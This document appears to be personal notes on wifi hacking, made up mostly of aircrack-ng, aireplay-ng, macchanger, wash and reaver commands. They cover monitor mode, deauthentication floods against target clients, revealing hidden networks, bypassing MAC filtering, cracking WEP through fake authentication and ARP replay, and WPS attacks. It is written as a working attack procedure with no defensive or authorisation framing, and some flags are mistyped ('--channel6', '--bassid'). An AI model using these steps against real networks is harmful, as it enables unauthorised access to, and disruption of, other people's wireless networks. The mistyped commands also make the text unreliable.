	Notes On Wifi Hacking

Have a wireless adapter that can inject packets and enter in monitor mode.

CMD to enter.
How to enter Monitor mode.. 1st way

airmon-ng
airmon-ng start (name of your wifi adapter (wlan1)) 
iwconfig wlan1mon

use the name that airmon-ng tells you

airmon-ng stop wlan1mon

-------------

2nd way

ifconfig wlan1mon down
iwconfig wlan1mon mode monitor
ifconfig wlan1mon up
iwconfig wlan1mon

------------------------------

3rd way

ifconfig wlan1mon down
airmon-ng check kill
airmon-ng start wlan1mon

----------------------------------------

see and scans the networks the wifi adapter is in range

airodump-ng wlan1mon

now we have our network we want to target


airodump-ng --channel6 --bassid 00:11:22:33:44:55 --write test-pizza wlan1mon 

 channel     mac address of target 
 write tells airodump to log all files
create a file test-pizza
name of wifi adapter


Deauthentication Attacks

use this to disconnect the target machine.
we want to disconnect to target machine and than we want to disconnect the target network.
once we disconnect the target access point we will spoof the access point for the target to connect to us.

aireplay-ng
aireplay-ng --deauth 1000 -a 33:22:02:33:33:33 -c 44:44:44:88:44:44 wlan1

airodump-ng name of our (adapter)


Discover hidden networks

# what networks are hidden <length: 0>

airodump-ng --bssid 33:22:02:33:33:33 --channel 6 wlan1

# disconnect the target and when they are connecting the name will show
in the 2nd terminal running   airodump-ng --bssid 00:11:22:33:44:55 --channel 6 wlan1 
 
aireplay-ng --deauth 1000 -a 33:22:02:33:33:33 -c 44:44:44:88:44:44 wlan1
Text editor Geany


How to put your computer in managed mode
ifconfig wlan1 down
iwconfig wlan1 mode managed 
ifconfig wlan1 up
iwconfig wlan1

service network-manager start

bypassing MAC filtering
run airodump-ng
airodump-ng --bssid 33:22:02:33:33:33 --channel 6 wlan1
after running get the target bssid

now spoof your mac address to the client mac address 
use the mac changer

ifconfig wlan1 down
macchanger -m 80:80:80:80:80:80
ifconfig wlan1 up

________
1st
Cracking WEP
128 encryption and 48

airodump-ng wlan1
        (name of wifi)
  
find a ENC that is WEP
copy the bssid
airodump-ng --bssid 00:11:22:33:44:55 --channel 11 --write test wlan1


open aircrack-ng

aircrack-ng test-01.cap 
            (file name)

____________________
2nd

Cracking WEP

Before we can Ininject packets:
Injecting Packets into traffic we have to Authenicate our wifi card with the AP..


Fake Authenicate.

aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:11:BB:00:CC:22 wlan1 

Than 

aireplay-ng --arpreplay 0 -b 00:11:22:33:44:55 -h AA:11:BB:00:CC:22 wlan1 
                          (bssid)

aircrack-ng (filename from airodump-ng --bssid 00:11:22:33:44:55 --channel 11 --write test wlan1
)   

aircrack-ng (filename) 

_________________________________

3rd

___________________________

1st
Wifi Cracking WPA / WPA2

wash -i wlan1

reaver -b 00:11:22:33:44:55 -c 11 -i wlan1

if you need help reaver --help


reaver -bssid 00:11:22:33:44:55 -channel 11 -i wlan1

aireplay-ng --fakeauth 100 -a 00:11:22:33:44:55 -h 00:00:00:11:11:11 wlan1

reaver -b 00:11:22:33:44:55 -c 11 -i wlan1 -A






 
